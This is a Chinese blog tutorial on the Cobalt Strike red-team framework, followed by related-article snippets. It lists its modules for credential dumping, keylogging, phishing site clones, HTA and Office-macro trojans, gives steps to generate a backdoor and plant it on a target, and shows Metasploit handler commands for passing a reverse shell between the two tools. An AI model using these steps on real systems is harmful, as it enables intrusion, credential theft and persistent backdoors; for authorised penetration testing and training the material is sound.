cobaltstrike简要使用

最新推荐文章于 2024-05-16 08:58:19 发布
最新推荐文章于 2024-05-16 08:58:19 发布
阅读量528 收藏
点赞数
分类专栏: 渗透测试之内网渗透 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51796436/article/details/128790661
版权

cobaltstrike简称cs,和msf的用处大致相同,利用已知漏洞直接拿取shell的工具,权限提升和留后门经常用到 @[toc]

cobaltstrike功能分析

cs下有一个文件为teamserver,是为团队协作准备的,运行teamserver 本地IP 登录密码即可将本机作为服务器供团队使用cs。 在客户端上用bash命令启动cobaltstrike.bat执行jar文件:bash cobaltstrike.bat,主机为teamserver服务器ip,密码是开启teamserver所用的密码

cs框架

cs下的文件分别具有的作用:

SCRIPTS用户安装的插件
log日志
c2lint检查profile的错误异常
cobaltstrike.jar客户端程序
icon.jpgLOGO
license.pdf许可证
teamserver服务端程序
update.jar更新程序
third-party第三方工具,放的vnc和dll

  • teamserver端: 服务器只能运行在linux系统中,可搭建在vps chmod +x teamserver./teamserver 服务端IP 连接密码启动

  • 客户端 客户端在windows\linux\mac下都能运行(需提前配置好java)

cscs的生成后门只支持windows端的木马

  • Cobalt strike模块:

New connection:新建连接(支持多个服务器端) preferences:偏好设置(界面、控制台、输出报告样式、teamserver连接记录) visualization:窗口视图模式(展示输出结果) VPN Interfaces:VPN接入 listenrs:监听器(创建listener) script manager:脚本管理 cs

  • view模块

Applications #应用(显示受害者机器的应用信息) Credentials #凭证(通过hashdump或Mimikatz抓取过的密码都会储存在这里) Downloads #下载文件 Event Log #事件日志(主机上线记录以及团队协作聊天记录)Keystrokes #键盘记录 Proxy Pivots #代理模块Screenshots #截图Script Console #脚本控制台(可以加载各种脚本,增强功能Targets #显示目标主机 Web Log #Web日志

  • attacks模块

Manage #对开启的web服务进行管理 Clone Site #克隆网站(可记录受害者提交的数据)Host File #提供Web以供下载某文件 Scripted Web Delivery #提供Web服务 Signed Applet Attack #启动Web服务以提供自签名Java Applet的运行环境 Smart Applet Attack #检测Java版本并利用已知的exploits绕过security System Profiler #用来获取一些系统信息,比如系统版本,浏览器版本等 HTML Application #生成恶意的HTA木马文件 MS Office Macro #生成office宏病毒文件 Payload Generator#生成各种语言版本的payload USB/CD AutoPlay #生成利用自动播放运行的木马文件 Windows Dropper #捆绑器,能够对文档类进行捆绑 Windows Executable #生成可执行Payload Windows Executable(S)#把包含payload,Stageless生成可执行文件(包含多数功能)

  • reporting模块

Activity report#活动报告 Hosts report #主机报告 Indicators of Compromise #威胁报告 Sessions report #会话报告 Social engineering report #社会工程学报告 Tactics,Techniques, and Procedures #策略、技巧和程序 Reset Data #重置数据 Export Data #导出数据

生成木马步骤

先在本地设置一个监听器:配置监听->add->选择协议、外网IP和端口 生成后门:attacks->packager->生成后门,将后门上传至靶机 beacon执行命令;beacon->shell+命令 来执行命令

cobalt strike和metasploit组合使用

在metasploit执行: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 本地IP set lport 本地端口 exploit

在cobalt strike执行: 设置监听 payload:windows/foreign/reverse_tcp 监听端口:msf的lport 然后在cs执行以下操作: 选择受害者主机,然后右击spawn 选择监听者:msf(刚开始新建的监听名字)

shell会反弹到msf

马戏团小丑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Rhinojs简要使用说明
05-22
使用RhinoJs的原因是为了实现在不重新发布的情况下让刚更改的查询方法立即生效。本系统所有与业务组织角色关联的查询语句拼接都在Rhinojs中实现 1、参考ContractNewDaoImpl中的permissionsSql方法:将与业务组织...
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2527
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
内网渗透——Cobalt Strike4.5 实现代理转发
m0_65544268的博客
07-11 714
3)创建监听器,正向链接的方式,监听端口22224)生成后门文件5)将生成的后门文件在主机2中运行执行命令。
Cobalt Strike使用教程一_cobaltstrike(1)
最新发布
2401_84264692的博客
05-16 953
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
cobaltstrike攻击流程,联动msf之socks代理
cc777777777的博客
05-15 1039
cobaltstrike攻击流程,联动msf之socks代理
Cobaltstrike Socks 代理隧道
LuckySec
02-18 4002
0x01 SOCKS Socks 代理相应的采用 Socks 协议的代理服务器就是 Socks 服务器,是一种通用的代理服务器代理服务器是指位于使用者和服务器之间的计算机。通过拦截发送方和接收方之间的连接来工作。重要的是可以隐藏用户实际IP地址保护用户信息安全。 Socks 不要求应用程序遵循特定的操作系统平台,Socks 代理与应用层代理、 HTTP 层代理不同,Socks 代理只是简单地传递数据包,而不必关心是何种应用协议(比如 FTP、HTTP 和 NNTP 请求)。所以,Socks 代理比其他应
隐藏cobaltstrike服务器-nginx反向代理
bring_coco的博客
06-27 954
可以看到都可以转发端口到80成功上线,同时nginx可以配置多个转发端口。编辑/etc/nginx/sites-enabled/default。取消server_tokens off 前面的注释。编辑/etc/nginx/nginx.conf。
DCM简要使用说明
08-22
DCM简要使用说明
Oracle SQL Developer 使用简要说明
06-30
Oracle SQL Developer 使用简要说明
ERPNeuroscan简要处理步骤.pptx
05-14
ERPNeuroscan简要处理步骤.pptx
Cobalt Strike基本使用
课嗨教育的专栏
06-01 306
Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。 Cobalt Strike整体功能了解参考 ...
RedWarden:Cobalt Strike C2反向代理_c2reverseproxy(1)
2401_83621095的博客
04-18 731
RedWarden可以充当HTTP/HTTPS反向代理,并对入站C2 HTTP请求施加若干限制,选择将哪些数据包定向到Teamserver以及需要丢弃哪些数据包,类似于Apache2的mod_rewrite中强制执行的.htaccess文件限制。RedWarden的创建是为了解决C2重定向器层上的IR/AV/EDRs/沙盒规避问题,它的目的是取代经典的Apache2+mod_rewrite设置。根据以下三种策略,无效数据包可能会被错误路由:重定向:将节点重定向至其他网站;
Cobalt Strike 使用指南(资源整合笔记)
天在等我,菜鸟想飞
12-30 7185
0x00 写在前面的话 Cobalt Strike自出世以来,一直在红队常用的工具行列。因其优良的团队协作性,被冠以多人运动的必备利器。 本文将网络上各路神仙的经验分享以渗透流程为依据进行了一次整合,旨在提供工具的学习使用流程。 1、工具介绍 CS是什么? Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成
CobaltStrike之内网穿透(Socks 隧道)
2301_76227305的博客
02-03 1396
众所周知,公网是无法直接访问内网的。但是如果我们控制了一台处于内网和公网边缘的服务器(就是同时有公网IP和私网IP),那么我们便可以利用这个服务器当作跳板,实现对目标内网的访问。之前一直不是很清楚内网与公网这个联系,通过自己搭建环境和配置ip,收获了很多知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
CobaltStrike使用
菜鸟-传奇
02-18 2299
CobaltStrike使用 01CobaltStrike CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成...
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集...
centos7 Failed to start iptables.service: Unit not found
weixin_30672019的博客
07-19 1124
在CentOS 7或RHEL 7或Fedora中防火墙由firewalld来管理 添加 firewall-cmd --zone=public --add-port=80/tcp --permanent (--permanent永久生效,没有此参数重启后失效) firewall-cmd --zone=public --add-port=1000-2000/tcp --permanent...
PowerDesigner 15.1 简要使用指南
"《Powerdesigner 15.1 简要使用手册》是由神州数码教育学院杨庆跃编写的教程,详细介绍了如何使用PowerDesigner这一强大的CASE工具集进行企业建模。PowerDesigner是Sybase公司的一款产品,提供图形化的界面,用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值